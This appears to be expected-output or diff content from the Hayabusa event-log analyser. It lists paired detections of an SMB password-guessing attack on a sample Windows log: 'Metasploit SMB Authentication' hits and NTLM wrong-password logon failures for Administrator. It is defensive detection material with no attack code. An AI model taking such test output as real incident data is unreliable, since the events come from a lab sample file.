+2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2o90lG6attzWU4ZN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PyPK9kuJdflQ4RKe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a9I3El7d7anR0kIz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eDUMTEfNhFuuqMle  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e0F70d1WstkqnQgA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bm0txApQSp1U42N3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JeEe5ENSIZnfc3FG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oasE54Z1FlpswY0d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bhje1BgvxOlG28JM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L9iTIv4UQ4En9RA2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mg8KFm1lCeImj8Sb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h17Fz1s6GJki61jg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6Pjjn4FAkJn4h32r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ARVx3FAAww8Gmfvc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sYIwPg5k1wpvWobN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0sfhYQ54SjC4JTX7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nfZYnUPV40FShcqt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XYbvWVCT0tFixZTH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XC6Vmz0ql8myDuGa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PJ8JvuvZZzwSOzFo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s06yKaogI6FYkXla  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pCjOc7PguxwNKoQR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BX5IosnpdYZK5xZj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gfMjB1epEm64wVEX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pb4FVO2SKsoMyt1K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1qoRw2jjFx4F6Wx6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ImiLeiteLoSw32I0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KcIYD47BIEP8gB0L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lUAeB15aWamcaZ8L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KFOKiSDWc1dWjzge  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hqyMtzjKSJEtEAdx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WtHsItpyFHQxvLWm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RdGMqIhUGHj23Xm2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BfE5LVmrPaAFLwBR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b1swKSla5gkdOwxH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kL9MdVnRVogiP7hF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aQ0hRdwZvC5PBcXl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ctbv73J0Dot9raD0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wKpWApJIKkjbtaPB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kVTAv9VoNpUyxQFM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xb3t1dpuk9JZri5p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fy0UrW8TWrxAOX90  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iUXUbUsiE6Ahh9iD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2QQdQ6rQYLBf15AF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zG4eJLuQ4u2dKQG0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
